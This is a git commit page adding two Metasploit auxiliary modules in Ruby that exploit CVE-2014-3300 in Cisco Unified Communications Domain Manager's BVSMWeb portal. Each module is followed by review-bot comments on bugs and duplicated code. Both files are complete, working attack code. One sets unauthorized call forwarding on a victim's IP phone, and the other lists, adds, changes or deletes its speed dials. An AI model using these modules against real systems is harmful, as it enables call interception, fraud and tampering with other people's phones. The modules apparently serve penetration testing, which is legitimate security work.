Land #4065, @fozavci's Cisco CUCDM auxiliary modules

bug/bundler_fix
jvazquez-r7 2015-01-10 01:11:45 -06:00
commit 49f04faf3f
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
2 changed files with 353 additions and 0 deletions


@ -0,0 +1,148 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rexml/document'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'Viproy CUCDM IP Phone XML Services - Call Forwarding Tool',
'Description' => %q{
The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager
(CDM) 10 does not properly implement access control, which allows remote attackers to
modify user information. This module exploits the vulnerability for configure unauthorized
call forwarding.
},
'Author' => 'fozavci',
'References' =>
[
['CVE', '2014-3300'],
['BID', '68331']
],
'License' => MSF_LICENSE,
'Actions' =>
[
[ 'Forward', { 'Description' => 'Enabling the call forwarding for the MAC address' } ],
[ 'Info', { 'Description' => 'Retrieving the call forwarding information for the MAC address' } ]
],
'DefaultAction' => 'Info'
))
register_options(
[
OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),
OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']),
OptString.new('FORWARDTO', [ true, 'Number to forward all calls', '007']),
OptString.new('FINTNUMBER', [ false, 'FINTNUMBER of IP Phones, required for multiple lines'])
], self.class)
end
def run
case action.name.upcase
when 'INFO'
get_info
when 'FORWARD'
forward_calls
end
end
def get_info
uri = normalize_uri(target_uri.to_s)
mac = datastore["MAC"]
print_status("#{peer} - Getting fintnumbers and display names of the IP phone")
res = send_request_cgi(
{
'uri' => normalize_uri(uri, 'showcallfwd.cgi'),
'method' => 'GET',
'vars_get' => {
'device' => "SEP#{mac}"
}
})
unless res && res.code == 200 && res.body && res.body.to_s =~ /fintnumber/
print_error("#{peer} - Target appears not vulnerable!")
print_status("#{res}")
return []
end
doc = REXML::Document.new(res.body)
lines = []
fint_numbers = []
list = doc.root.get_elements('MenuItem')
list.each do |lst|
xlist = lst.get_elements('Name')
xlist.each {|l| lines << "#{l[0]}"}
xlist = lst.get_elements('URL')
xlist.each {|l| fint_numbers << "#{l[0].to_s.split('fintnumber=')[1]}" }
end
lines.size.times do |i|
print_status("#{peer} - Display Name: #{lines[i]}, Fintnumber: #{fint_numbers[i]}")
end
fint_numbers
end
def forward_calls
# for a specific FINTNUMBER redirection
uri = normalize_uri(target_uri.to_s)
forward_to = datastore["FORWARDTO"]
mac = datastore["MAC"]
if datastore['FINTNUMBER']
fint_numbers = [datastore['FINTNUMBER']]
else
fint_numbers = get_info
end
if fint_numbers.empty?
print_error("#{peer} - FINTNUMBER required to forward calls")
return
end
fint_numbers.each do |fintnumber|
print_status("#{peer} - Sending call forward request for #{fintnumber}")
send_request_cgi(
{
'uri' => normalize_uri(uri, 'phonecallfwd.cgi'),
'method' => 'GET',
'vars_get' => {
'cfoption' => 'CallForwardAll',
'device' => "SEP#{mac}",
'ProviderName' => 'NULL',
'fintnumber' => "#{fintnumber}",
'telno1' => "#{forward_to}"
}
})
res = send_request_cgi(
{
'uri' => normalize_uri(uri, 'showcallfwdperline.cgi'),
'method' => 'GET',
'vars_get' => {
'device' => "SEP#{mac}",
'fintnumber' => "#{fintnumber}"
}
})
if res && res.body && res.body && res.body.to_s =~ /CFA/
print_good("#{peer} - Call forwarded successfully for #{fintnumber}")
else
print_status("#{peer} - Call forward failed.")
end
end
end
end
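Review bot: In `get_info` the response body is passed to `REXML::Document.new` after only a substring match on `fintnumber`, so a malformed body raises `REXML::ParseException` and a body with no root element makes `doc.root.get_elements` fail on nil; either way the module aborts with a stack trace instead of a clean error. The failure branch also runs `print_status("#{res}")` when `res` is nil, which prints an empty line rather than reporting that no response arrived. Display names and fintnumbers are collected into two separate arrays and paired by index, so a `MenuItem` missing either child would misalign the printed pairs. In `forward_calls` the final condition repeats `res.body` twice and never checks `res.code`, and the return value of the `phonecallfwd.cgi` request is discarded.

```ruby
begin
  doc = REXML::Document.new(res.body)
rescue REXML::ParseException => e
  print_error("#{peer} - Could not parse XML response: #{e.message}")
  return []
end
unless doc.root
  print_error("#{peer} - XML response has no root element")
  return []
end
# … unchanged: MenuItem iteration and status output …
```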


@ -0,0 +1,205 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rexml/document'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'Viproy CUCDM IP Phone XML Services - Speed Dial Attack Tool',
'Description' => %q{
The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager
(CDM), before version 10, doesn't implement access control properly, which allows remote
attackers to modify user information. This module exploits the vulnerability to make
unauthorized speeddial manipulations.
},
'Author' => 'fozavci',
'References' =>
[
['CVE', '2014-3300'],
['BID', '68331']
],
'License' => MSF_LICENSE,
'Actions' =>
[
[ 'List', { 'Description' => 'Getting the speeddials for the MAC address' } ],
[ 'Modify', { 'Description' => 'Modifying a speeddial for the MAC address' } ],
[ 'Add', { 'Description' => 'Adding a speeddial for the MAC address' } ],
[ 'Delete', { 'Description' => 'Deleting a speeddial for the MAC address' } ]
],
'DefaultAction' => 'List'
))
register_options(
[
OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),
OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']),
OptString.new('NAME', [ false, 'Name for Speed Dial', 'viproy']),
OptString.new('POSITION', [ false, 'Position for Speed Dial', '1']),
OptString.new('TELNO', [ false, 'Phone number for Speed Dial', '007']),
], self.class)
end
def run
case action.name.upcase
when 'MODIFY'
modify
when 'DELETE'
delete
when 'ADD'
add
when 'LIST'
list
end
end
def send_rcv(uri, vars_get)
uri = normalize_uri(target_uri.to_s, uri.to_s)
res = send_request_cgi(
{
'uri' => uri,
'method' => 'GET',
'vars_get' => vars_get
})
if res && res.code == 200 && res.body && res.body.to_s =~ /Speed [D|d]ial/
return Exploit::CheckCode::Vulnerable, res
else
print_error("#{peer} - Target appears not vulnerable!")
return Exploit::CheckCode::Safe, res
end
end
def parse(res)
doc = REXML::Document.new(res.body)
names = []
phones = []
list = doc.root.get_elements('DirectoryEntry')
list.each do |lst|
xlist = lst.get_elements('Name')
xlist.each {|l| names << "#{l[0]}"}
xlist = lst.get_elements('Telephone')
xlist.each {|l| phones << "#{l[0]}" }
end
if names.size > 0
names.size.times do |i|
info = ''
info << "Position: #{names[i].split(":")[0]}, "
info << "Name: #{names[i].split(":")[1]}, "
info << "Telephone: #{phones[i]}"
print_good("#{peer} - #{info}")
end
else
print_status("#{peer} - No Speed Dial detected")
end
end
def list
mac = datastore['MAC']
print_status("#{peer} - Getting Speed Dials of the IP phone")
vars_get = {
'device' => "SEP#{mac}"
}
status, res = send_rcv('speeddials.cgi', vars_get)
parse(res) unless status == Exploit::CheckCode::Safe
end
def add
mac = datastore['MAC']
name = datastore['NAME']
position = datastore['POSITION']
telno = datastore['TELNO']
print_status("#{peer} - Adding Speed Dial to the IP phone")
vars_get = {
'name' => "#{name}",
'telno' => "#{telno}",
'device' => "SEP#{mac}",
'entry' => "#{position}",
'mac' => "#{mac}"
}
status, res = send_rcv('phonespeedialadd.cgi', vars_get)
if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Added/
print_good("#{peer} - Speed Dial #{position} is added successfully")
elsif res && res.body && res.body.to_s =~ /exist/
print_error("#{peer} - Speed Dial is exist, change the position or choose modify!")
else
print_error("#{peer} - Speed Dial couldn't add!")
end
end
def delete
mac = datastore['MAC']
position = datastore['POSITION']
print_status("#{peer} - Deleting Speed Dial of the IP phone")
vars_get = {
'entry' => "#{position}",
'device' => "SEP#{mac}"
}
status, res = send_rcv('phonespeeddialdelete.cgi', vars_get)
if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Deleted/
print_good("#{peer} - Speed Dial #{position} is deleted successfully")
else
print_error("#{peer} - Speed Dial is not found!")
end
end
def modify
mac = datastore['MAC']
name = datastore['NAME']
position = datastore['POSITION']
telno = datastore['TELNO']
print_status("#{peer} - Deleting Speed Dial of the IP phone")
vars_get = {
'entry' => "#{position}",
'device' => "SEP#{mac}"
}
status, res = send_rcv('phonespeeddialdelete.cgi', vars_get)
if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Deleted/
print_good("#{peer} - Speed Dial #{position} is deleted successfully")
print_status("#{peer} - Adding Speed Dial to the IP phone")
vars_get = {
'name' => "#{name}",
'telno' => "#{telno}",
'device' => "SEP#{mac}",
'entry' => "#{position}",
'mac' => "#{mac}"
}
status, res = send_rcv('phonespeedialadd.cgi', vars_get)
if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Added/
print_good("#{peer} - Speed Dial #{position} is added successfully")
elsif res && res.body =~ /exist/
print_error("#{peer} - Speed Dial is exist, change the position or choose modify!")
else
print_error("#{peer} - Speed Dial couldn't add!")
end
else
print_error("#{peer} - Speed Dial is not found!")
end
end
end
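Review bot: The success check in `send_rcv` uses `/Speed [D|d]ial/`, where the character class also matches a literal `|`; `/Speed [Dd]ial/` states the intent. `modify` repeats the bodies of `delete` and `add` almost line for line, and the copy has already drifted: it tests `res.body =~ /exist/` where `add` uses `res.body.to_s =~ /exist/`. Having `delete` return whether it succeeded and letting `modify` call `delete` then `add` would remove the duplicate. `parse` also calls `doc.root.get_elements` without handling a parse failure or a nil root. The Description says the flaw affects CDM "before version 10", while the call-forwarding module in this same commit says "CDM 10" for the same CVE-2014-3300; the two should agree, checked against the vendor advisory.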